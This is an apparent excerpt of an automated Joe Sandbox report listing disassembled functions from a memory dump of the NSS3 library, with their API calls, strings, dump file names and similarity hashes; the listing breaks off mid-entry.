PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C6EDE64), ref: 6C6EED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6EED22

Part of subcall function 6C6FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7D18D0,?), ref: 6C6FB095

PL_FreeArenaPool.NSS3(?), ref: 6C6EED4A
PL_FinishArenaPool.NSS3(?), ref: 6C6EED6B
PR_CallOnce.NSS3(6C802AA4,6C7012D0), ref: 6C6EED38

Part of subcall function 6C624C70: TlsGetValue.KERNEL32(?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624C97
Part of subcall function 6C624C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624CB0
Part of subcall function 6C624C70: PR_Unlock.NSS3(?,?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C6EED52
PR_CallOnce.NSS3(6C802AA4,6C7012D0), ref: 6C6EED83
PL_FreeArenaPool.NSS3(?), ref: 6C6EED95
PL_FinishArenaPool.NSS3(?), ref: 6C6EED9D

Part of subcall function 6C7064F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C70127C,00000000,00000000,00000000), ref: 6C70650E

Strings

security, xrefs: 6C6EED06

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 6076ff5c9d7d9cbe34caaabc69d0a6b9d63f698b082ff02d706b78304bd8dfa3
Instruction ID: fe470c8a70165a05d9eded73ea9bda9df979d6e938881804ca87e90a14799472
Opcode Fuzzy Hash: 6076ff5c9d7d9cbe34caaabc69d0a6b9d63f698b082ff02d706b78304bd8dfa3
Instruction Fuzzy Hash: 6D115BB2B0520467E7105625AD49BBB72F8AF4671CF010536FC5462E81FB68A70CC7DE

Function 6C7B0EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C692357), ref: 6C7B0EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C692357), ref: 6C7B0EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C7B0EE6

Part of subcall function 6C7B09D0: PR_Now.NSS3 ref: 6C7B0A22
Part of subcall function 6C7B09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C7B0A35
Part of subcall function 6C7B09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C7B0A66
Part of subcall function 6C7B09D0: PR_GetCurrentThread.NSS3 ref: 6C7B0A70
Part of subcall function 6C7B09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C7B0A9D
Part of subcall function 6C7B09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C7B0AC8
Part of subcall function 6C7B09D0: PR_vsmprintf.NSS3(?,?), ref: 6C7B0AE8
Part of subcall function 6C7B09D0: EnterCriticalSection.KERNEL32(?), ref: 6C7B0B19
Part of subcall function 6C7B09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C7B0B48
Part of subcall function 6C7B09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C7B0C76
Part of subcall function 6C7B09D0: PR_LogFlush.NSS3 ref: 6C7B0C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C7B0EFA

Part of subcall function 6C69AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C69AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7B0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7B0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7B0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7B0F2B

Strings

Aborting, xrefs: 6C7B0EB3
Assertion failure: %s, at %s:%d, xrefs: 6C7B0ED9, 6C7B0EE5, 6C7B0F06, 6C7B0F0B

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: 9293ae0a841eab547562a2dcce483bb3151af054aff71caddc62c6a1ed5751db
Instruction ID: a31c5bf03d1be4ccb1d22b0a423bfe787a353bc5a4df8adea3c34bf4598f8f13
Opcode Fuzzy Hash: 9293ae0a841eab547562a2dcce483bb3151af054aff71caddc62c6a1ed5751db
Instruction Fuzzy Hash: 21F0AFF69001187BEA107B60AD8EC9F3F2DEF86265F044034FD1956A02DA36E91896B2

Function 6C714DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C714DCB

Part of subcall function 6C700FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6A87ED,00000800,6C69EF74,00000000), ref: 6C701000
Part of subcall function 6C700FF0: PR_NewLock.NSS3(?,00000800,6C69EF74,00000000), ref: 6C701016
Part of subcall function 6C700FF0: PL_InitArenaPool.NSS3(00000000,security,6C6A87ED,00000008,?,00000800,6C69EF74,00000000), ref: 6C70102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C714DE1

Part of subcall function 6C7010C0: TlsGetValue.KERNEL32(?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C7010F3
Part of subcall function 6C7010C0: EnterCriticalSection.KERNEL32(?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C70110C
Part of subcall function 6C7010C0: PL_ArenaAllocate.NSS3(?,?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C701141
Part of subcall function 6C7010C0: PR_Unlock.NSS3(?,?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C701182
Part of subcall function 6C7010C0: TlsGetValue.KERNEL32(?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C70119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C714DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C714E59

Part of subcall function 6C6FFAB0: free.MOZGLUE(?,-00000001,?,?,6C69F673,00000000,00000000), ref: 6C6FFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C7D300C,00000000), ref: 6C714EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C714EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C714F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C71521A

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: 96924e2b1ac10744f5c6b9e84850619b30b50d79ac5b0df94ca064cc00a7769b
Instruction ID: fbeb15c941130a66d802f208b4829d15bfbc0b89ce736ca0cf81b1ae804d18e0
Opcode Fuzzy Hash: 96924e2b1ac10744f5c6b9e84850619b30b50d79ac5b0df94ca064cc00a7769b
Instruction Fuzzy Hash: F8F19EB1E04209CFDB08CF54E9407ADB7B2FF45358F298169E915ABB81E735E981CB90

Function 6C642E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C642F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C642FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C643005
memcpy.VCRUNTIME140(?,?,?), ref: 6C6430EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C643131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C643178

Strings

database corruption, xrefs: 6C64316C
%s at line %d of [%.10s], xrefs: 6C643171
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C643022, 6C643156, 6C643162, 6C64318A, 6C643196, 6C6431A2, 6C6431AE, 6C6431BA, 6C6431C6

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: 17b25def066f81e6b3920593e3152826f3a303914fd587f540aa8f0393b573b0
Instruction ID: 959cca974570d077f670b3dec0aefe64ee3a21775b0500c214555e016f3b291f
Opcode Fuzzy Hash: 17b25def066f81e6b3920593e3152826f3a303914fd587f540aa8f0393b573b0
Instruction Fuzzy Hash: 2CB19EB1E05219DBDB18CF9DC885AEEB7B1BF48304F24C169E845B7B41D374A941CBA8

Function 6C692D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C692D69

Strings

winTruncate2, xrefs: 6C692EF8
winUnmapfile2, xrefs: 6C692F7F
winUnmapfile1, xrefs: 6C692F55
P{l, xrefs: 6C692E74, 6C692EC5, 6C692F32, 6C692F5C
winSeekFile, xrefs: 6C692E9C
winTruncate1, xrefs: 6C692EBE
{l, xrefs: 6C692DD0
@{l, xrefs: 6C692E24

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: __allrem
String ID: @{l$P{l$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2${l
API String ID: 2933888876-15053677
Opcode ID: f1c46f79f3a42c7a8edcd21d90ca4b6453a83b2a8458a00f338eb3e730b5da14
Instruction ID: b744b804229a5cbff1a3d5732e98b62eced6ebb1b1f4087f55b7619ad064c6ac
Opcode Fuzzy Hash: f1c46f79f3a42c7a8edcd21d90ca4b6453a83b2a8458a00f338eb3e730b5da14
Instruction Fuzzy Hash: 68619E71B402059FDB54CF68DC98AAA77B1FB89314F10813DE916AB790EB30AD06CB95

Function 6C6A0F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C6A0F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C6A0F84

Part of subcall function 6C6FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7D18D0,?), ref: 6C6FB095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C6BF59B,6C7C890C,?), ref: 6C6A0FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C6A0FC1

Part of subcall function 6C700BE0: malloc.MOZGLUE(6C6F8D2D,?,00000000,?), ref: 6C700BF8
Part of subcall function 6C700BE0: TlsGetValue.KERNEL32(6C6F8D2D,?,00000000,?), ref: 6C700C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C6A0FDB
PR_CallOnce.NSS3(6C802AA4,6C7012D0), ref: 6C6A0FEF
PL_FreeArenaPool.NSS3(?), ref: 6C6A1001
PL_FinishArenaPool.NSS3(?), ref: 6C6A1009

Strings

security, xrefs: 6C6A0F5C

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: 161b75b0dc80d785add70ce97e6fa7c9d4b31ff58aba11cd9aecdbb41493172f
Instruction ID: 8d35e58cd151284e55f84f4f8f24e5de992d342efc695e9a6b2e5b3107369385
Opcode Fuzzy Hash: 161b75b0dc80d785add70ce97e6fa7c9d4b31ff58aba11cd9aecdbb41493172f
Instruction Fuzzy Hash: 6C21F5B1A04204ABE7109F24DD45AAB77B4EF4535CF048528FC1897601FB31DA46CBD6

Function 6C6A6DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C6A7D8F,6C6A7D8F,?,?), ref: 6C6A6DC8

Part of subcall function 6C6FFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C6FFE08
Part of subcall function 6C6FFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C6FFE1D
Part of subcall function 6C6FFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C6FFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C6A7D8F,?,?), ref: 6C6A6DD5

Part of subcall function 6C7010C0: TlsGetValue.KERNEL32(?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C7010F3
Part of subcall function 6C7010C0: EnterCriticalSection.KERNEL32(?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C70110C
Part of subcall function 6C7010C0: PL_ArenaAllocate.NSS3(?,?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C701141
Part of subcall function 6C7010C0: PR_Unlock.NSS3(?,?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C701182
Part of subcall function 6C7010C0: TlsGetValue.KERNEL32(?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C70119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C7C8FA0,00000000,?,?,?,?,6C6A7D8F,?,?), ref: 6C6A6DF7

Part of subcall function 6C6FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7D18D0,?), ref: 6C6FB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C6A6E35

Part of subcall function 6C6FFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C6FFE29
Part of subcall function 6C6FFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C6FFE3D
Part of subcall function 6C6FFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C6FFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C6A6E4C

Part of subcall function 6C7010C0: PL_ArenaAllocate.NSS3(?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C70116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C7C8FE0,00000000), ref: 6C6A6E82

Part of subcall function 6C6A6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C6AB21D,00000000,00000000,6C6AB219,?,6C6A6BFB,00000000,?,00000000,00000000,?,?,?,6C6AB21D), ref: 6C6A6B01
Part of subcall function 6C6A6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C6A6B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C6A6F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C6A6F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C7C8FE0,00000000), ref: 6C6A6F6B
PR_SetError.NSS3(FFFFE005,00000000,6C6A7D8F,?,?), ref: 6C6A6FE1

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: aeca755b86c1e0287f5b8634abe3335bb7ea29cd4ec3dfd287f198d3aff27361
Instruction ID: 46baf629ad8188e5347a0e920c952f67f9ccea98f4120b6070e3ec005c92816b
Opcode Fuzzy Hash: aeca755b86c1e0287f5b8634abe3335bb7ea29cd4ec3dfd287f198d3aff27361
Instruction Fuzzy Hash: C47192B1E102469FDB00CF59CD40BAA7BA5BF99308F154229E818D7B11F770EA96CB94

Function 6C6EADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE10
EnterCriticalSection.KERNEL32(?,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C6CD079,00000000,00000001), ref: 6C6EAE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE7F
TlsGetValue.KERNEL32(?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAEF1
free.MOZGLUE(6C6CCDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6CCDBB,?), ref: 6C6EAF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAF30

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: d0efd7399664b4a7ab43d2a19bebd9f158faf4dc44f967573428d057cc0a5e6c
Instruction ID: d7167fbd7bbd8d53bf08d14b2325e89c08712adb1b60d95b137a570330de153e
Opcode Fuzzy Hash: d0efd7399664b4a7ab43d2a19bebd9f158faf4dc44f967573428d057cc0a5e6c
Instruction Fuzzy Hash: 1551D1B5A06602AFDB00DF29D884B56BBB4FF09318F144266E81897F12E731F865CBD5

Function 6C6C4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C6CAB7F,?,00000000,?), ref: 6C6C4CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C6CAB7F,?,00000000,?), ref: 6C6C4CC8
TlsGetValue.KERNEL32(?,6C6CAB7F,?,00000000,?), ref: 6C6C4CE0
EnterCriticalSection.KERNEL32(?,?,6C6CAB7F,?,00000000,?), ref: 6C6C4CF4
PL_HashTableLookup.NSS3(?,?,?,6C6CAB7F,?,00000000,?), ref: 6C6C4D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C6C4D10

Part of subcall function 6C74DD70: TlsGetValue.KERNEL32 ref: 6C74DD8C
Part of subcall function 6C74DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C74DDB4

PR_Now.NSS3(?,00000000,?), ref: 6C6C4D26

Part of subcall function 6C769DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C7B0A27), ref: 6C769DC6
Part of subcall function 6C769DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C7B0A27), ref: 6C769DD1
Part of subcall function 6C769DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C769DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C6C4D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C6C4DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C6C4E02

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 4366cef64cd3629547d613d9ee640a8408253d2710136d52e9e3bde94d70c1c4
Instruction ID: 3347e9db5e664bc394e676cc4f714e05ca03ceb5f18e03b52653645f26064108
Opcode Fuzzy Hash: 4366cef64cd3629547d613d9ee640a8408253d2710136d52e9e3bde94d70c1c4
Instruction Fuzzy Hash: DE41C7B5B001059BEB00AF28EC8497677B8EF1635DF044170EC1897B11EB71E924C7DA

Function 6C6C89C0 Relevance: 15.1, APIs: 10, Instructions: 84COMMON

Download Yara Rule

APIs

PK11_CreateDigestContext.NSS3(00000004,00000000,00000000,00000000,00000000,?,6C6CAE9B,00000000,?,?), ref: 6C6C89DE
PK11_DigestBegin.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6C6A2D6B,?,?,00000000), ref: 6C6C89EF
PK11_DigestOp.NSS3(00000000,57016AC6,034C08E8,?,00000000,?,?,?,?,?,?,?,?,?,?,6C6A2D6B), ref: 6C6C8A02
PK11_DestroyContext.NSS3(00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6C6A2D6B,?), ref: 6C6C8A11

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: K11_$Digest$Context$BeginCreateDestroy
String ID:
API String ID: 407214398-0
Opcode ID: 7949a302088c2cc2da07f15015ff15d232f8221007545ae7c193c8f62696a3ff
